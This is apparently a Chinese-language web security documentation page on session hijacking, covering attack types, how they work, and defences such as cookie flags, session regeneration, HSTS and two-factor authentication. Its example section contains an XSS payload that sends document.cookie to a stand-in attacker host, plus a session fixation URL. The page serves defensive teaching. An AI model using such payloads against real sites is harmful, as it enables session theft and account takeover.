跳到主要内容

会话劫持

威胁描述

会话劫持(Session Hijacking)是一种攻击方式,攻击者通过窃取或控制用户的会话标识(如Cookie、Session ID),冒充合法用户访问Web应用程序。由于会话标识是用户认证的核心凭证,会话劫持可能导致未授权访问用户账户、数据泄露和恶意操作等严重后果。

类型分类

1. Cookie窃取

攻击者通过XSS、网络嗅探等方式获取用户的Cookie信息。

2. 会话固定

攻击者预先设置一个会话标识,诱导用户使用该标识登录,然后利用该标识冒充用户。

3. 会话侧信道攻击

攻击者通过分析用户与服务器之间的通信模式,推断会话标识。

工作原理

  1. 用户登录Web应用程序,服务器生成会话标识并发送给客户端
  2. 攻击者通过各种手段获取该会话标识
  3. 攻击者使用窃取的会话标识发送请求到服务器
  4. 服务器验证会话标识有效,认为是合法用户,从而执行攻击者的请求

示例代码

1. 通过XSS窃取Cookie

// 攻击者注入的XSS代码
<script>
    // 窃取Cookie并发送到攻击者服务器
    fetch('https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie));
</script>

2. 会话固定攻击

<!-- 攻击者构造包含固定会话ID的URL -->
https://example.com/login?sessionId=attacker-controlled-id

<!-- 用户点击该URL并登录 -->
<!-- 攻击者使用相同的sessionId访问系统 -->

3. 网络嗅探

// 攻击者通过网络嗅探工具捕获数据包
// 提取Cookie信息
const packet = captureNetworkPacket();
const cookie = extractCookie(packet);
// 使用Cookie发起请求
fetch('https://example.com/protected', {
    headers: {
        'Cookie': cookie
    }
});

防御措施

1. 安全的Cookie设置

设置Cookie的Secure、HttpOnly和SameSite属性:

Set-Cookie: sessionId=abc123; Secure; HttpOnly; SameSite=Strict

2. 会话超时

设置合理的会话超时时间,减少会话被劫持后的风险:

// 服务器端设置会话超时为30分钟
session.cookie.maxAge = 30 * 60 * 1000;

3. 会话重生成

在关键操作(如登录、密码修改)后重生成会话标识:

// 登录成功后重生成会话ID
req.session.regenerate(function(err) {
    // 重生成会话后的操作
});

4. 双因素认证

实施双因素认证,即使会话被劫持也能提供额外的安全层:

// 验证双因素认证码
auth.verifyTwoFactorCode(userId, code, function(valid) {
    if (valid) {
        // 允许访问
    } else {
        // 拒绝访问
    }
});

5. HTTPS加密

使用HTTPS加密所有通信,防止网络嗅探:

// 前端使用HTTPS发起请求
fetch('https://example.com/api/data', {
    method: 'GET',
    credentials: 'same-origin'
});

最佳实践

  1. 始终设置Cookie的Secure、HttpOnly和SameSite属性

    • Secure属性确保Cookie仅通过HTTPS传输,防止网络嗅探工具窃取。
    • HttpOnly属性防止JavaScript访问Cookie,有效抵御XSS攻击窃取会话标识。
    • SameSite属性限制Cookie仅在同一站点请求中发送,防止CSRF攻击和某些会话劫持场景。
    • 示例:Set-Cookie: sessionId=abc123; Secure; HttpOnly; SameSite=Strict。其中,SameSite=Strict提供最强的保护,SameSite=Lax在兼容性和安全性间取得平衡。

  2. 实施会话超时和自动登出机制

    • 设置合理的会话超时时间(如30分钟),减少会话被劫持后的风险窗口。
    • 实现自动登出功能,当用户长时间不活动时自动注销,清除会话标识。
    • 前端和后端应同时实现超时机制,前端可以通过定时器检测用户活动,后端设置Cookie的maxAge属性。
    • 示例:服务端设置session.cookie.maxAge = 30 * 60 * 1000;,前端使用setTimeout检测用户无活动超过30分钟后提示登出。

  3. 在关键操作后重生成会话标识

    • 关键操作(如登录、密码修改、支付、权限变更等)后立即重生成会话ID,使旧会话失效。
    • 重生成会话可以防止会话固定攻击,即使攻击者预先设置了会话ID,登录后也会被替换。
    • 确保重生成会话后,旧会话的所有数据被正确迁移到新会话。
    • 示例:登录成功后调用req.session.regenerate(function(err) { /* 重生成会话后的操作 */ });

  4. 使用HTTPS加密所有通信

    • HTTPS通过TLS/SSL协议加密传输数据,防止中间人攻击和网络嗅探窃取会话标识。
    • 配置HTTP严格传输安全(HSTS)头部,强制浏览器使用HTTPS连接,防止SSL剥离攻击。
    • 确保所有子域名也使用HTTPS,并在HSTS头部中包含includeSubDomains选项。
    • 示例:设置HSTS头部:Strict-Transport-Security: max-age=31536000; includeSubDomains

  5. 实现双因素认证,提供额外的安全层

    • 双因素认证要求用户提供两种不同的认证因素(如密码+短信验证码、密码+生物识别),即使会话被劫持,攻击者也无法通过双因素验证。
    • 支持多种双因素认证方式,如短信验证码、认证应用(Google Authenticator、Microsoft Authenticator)、硬件令牌(YubiKey)等。
    • 对于高风险账户或敏感操作,强制要求双因素认证。
    • 示例:使用Google Authenticator生成一次性验证码,用户扫描二维码后,应用每30秒生成新的验证码。

  6. 对敏感操作实施二次验证

    • 敏感操作(如修改密码、添加银行卡、转账、删除数据等)要求用户再次验证身份,即使会话被劫持也能阻止攻击者执行这些操作。
    • 二次验证可以是密码验证、短信验证码、生物识别等方式。
    • 确保二次验证流程独立于主会话,避免被同一劫持会话绕过。
    • 示例:转账时要求用户输入支付密码或短信验证码,即使登录会话被劫持,攻击者也无法完成转账。

  7. 教育用户识别钓鱼攻击和恶意链接

    • 钓鱼攻击是获取会话标识的常见手段,通过模仿合法网站诱导用户输入凭证或点击恶意链接。
    • 教育用户检查URL是否正确(如拼写错误、额外字符)、查看网站SSL证书(点击地址栏锁图标)、警惕可疑邮件和短信等。
    • 提供安全提示,如登录页面应有品牌标识、官方网站URL等。
    • 示例:在登录页面添加安全提示:“请确认网址为https://example.com,警惕钓鱼网站”。

  8. 定期进行安全测试,检测会话管理的漏洞

    • 安全测试可以发现会话管理中的潜在漏洞,如会话固定、Cookie设置不当、会话超时过长等。
    • 使用自动化工具(如OWASP ZAP、Burp Suite)进行定期扫描,检测会话相关的安全问题。
    • 进行渗透测试,模拟攻击者尝试劫持会话,验证防御措施的有效性。
    • 示例:使用OWASP ZAP的会话管理测试功能,检测是否存在会话固定漏洞。

  9. 保持Web应用程序和依赖库的更新,以防止已知漏洞被利用

    • 许多会话劫持漏洞是由于使用了存在安全问题的库或框架版本导致的,如Cookie处理漏洞、会话管理缺陷等。
    • 及时更新Web应用程序和依赖库,修复已知的安全漏洞。
    • 使用依赖管理工具(如npm、yarn)定期检查并更新存在安全隐患的依赖包。
    • 示例:使用npm audit命令检查项目中的安全漏洞,并使用npm update更新存在漏洞的依赖包。